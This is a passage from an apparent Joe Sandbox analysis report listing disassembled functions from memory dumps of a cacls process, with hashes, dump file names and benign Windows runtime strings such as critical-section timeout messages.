                                                                                                              • Instruction Fuzzy Hash: D82156BAA002599FDB10EF69E840DEEB7F9FF44640F480556EA05E7250E730D9018B95
                                                                                                              Function 03410388 Relevance: 7.6, Strings: 6, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518105057.0000000003410000.00000040.00000800.00020000.00000000.sdmp, Offset: 03410000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3410000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: |de$|de$|de$|de$|de$|de
                                                                                                              • API String ID: 0-3287866246
                                                                                                              • Opcode ID: e6d338e7b14db9c33ec4048beedf938403ba15f5c62fb8eaccc9d8e066023ef1
                                                                                                              • Instruction ID: ad47d2fc6b3af9f8a15bea5dc85e2eb1467235de264fe1936009458c84b2961a
                                                                                                              • Opcode Fuzzy Hash: e6d338e7b14db9c33ec4048beedf938403ba15f5c62fb8eaccc9d8e066023ef1
                                                                                                              • Instruction Fuzzy Hash: A3216870918B4E8FCF80EFA8D885AEEBBB0FB19300F00455AD549EB221D7349245CBD6
                                                                                                              Function 0356F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 035B02BD
                                                                                                              • RTL: Re-Waiting, xrefs: 035B031E
                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 035B02E7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                              • API String ID: 0-2474120054
                                                                                                              • Opcode ID: cf61d9328d57e5fb69d365915a12d3db07a1401223f10c34764b7de7534a4a88
                                                                                                              • Instruction ID: 03c82e633ae8a854a09ca5da24c9ad15dce3c3ded91a92ac48c5a2808db2b735
                                                                                                              • Opcode Fuzzy Hash: cf61d9328d57e5fb69d365915a12d3db07a1401223f10c34764b7de7534a4a88
                                                                                                              • Instruction Fuzzy Hash: 63E1BC30A087429FD724CF28E884B6AB7F0BB85314F184A6DF5A58B2F1D774D945CB92
                                                                                                              Function 0357BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 035B7B7F
                                                                                                              • RTL: Resource at %p, xrefs: 035B7B8E
                                                                                                              • RTL: Re-Waiting, xrefs: 035B7BAC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 0-871070163
                                                                                                              • Opcode ID: c43ccbc911f3adc4b3fc5078dfebd8bd65a99fdd86ffdf47ba85e82b23edc2a3
                                                                                                              • Instruction ID: 50d0a560e36a3b9171fbcad11a78817a325127efa442038e925bf9a282f22af5
                                                                                                              • Opcode Fuzzy Hash: c43ccbc911f3adc4b3fc5078dfebd8bd65a99fdd86ffdf47ba85e82b23edc2a3
                                                                                                              • Instruction Fuzzy Hash: ED41D0353047029FD724DE29F840B6AB7E5FF89B10F040A1DE95ADB2A0EB71E5068B91
                                                                                                              Function 0357B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 035B728C
                                                                                                              Strings
                                                                                                              • RTL: Resource at %p, xrefs: 035B72A3
                                                                                                              • RTL: Re-Waiting, xrefs: 035B72C1
                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 035B7294
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 885266447-605551621
                                                                                                              • Opcode ID: 986adcd6e9ce786463a3fcf6321e2f5689daa2f5e4980c336bce50c5e880a0b4
                                                                                                              • Instruction ID: 8abb22b708101563bd4a3db417ce6b87bc03be5ea04a1db9bd5eb0957e859a2f
                                                                                                              • Opcode Fuzzy Hash: 986adcd6e9ce786463a3fcf6321e2f5689daa2f5e4980c336bce50c5e880a0b4
                                                                                                              • Instruction Fuzzy Hash: 4A41EF35600346AFD720DE24EC41FAAF7B6FF89710F140A19F995EB2A0DB21E84287D1
                                                                                                              Function 035F2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$]:%u
                                                                                                              • API String ID: 48624451-3050659472
                                                                                                              • Opcode ID: 8307a06223ad2da2f868e8882994b13d5961204cf3f11a4e8c41998eaa239ccd
                                                                                                              • Instruction ID: ed075bf3b15e9847011c54e53455c524fbe6bf8108620d86af616f5e5107d49d
                                                                                                              • Opcode Fuzzy Hash: 8307a06223ad2da2f868e8882994b13d5961204cf3f11a4e8c41998eaa239ccd
                                                                                                              • Instruction Fuzzy Hash: 75318CBAA006199FDB20DF29EC40BEEB7F8FF44610F444956E949E7150EB70DA458F60
                                                                                                              Function 03587D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-
                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                              • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                              • Instruction ID: 9c41e777d3b120504e07ff9d2e774ae6b1304554ac95b094e7bbb6fed137a0f7
                                                                                                              • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                              • Instruction Fuzzy Hash: BE918471E002169BDB24FF6AE8816BEB7B5FF88720F78455AE865F72E0D73099408750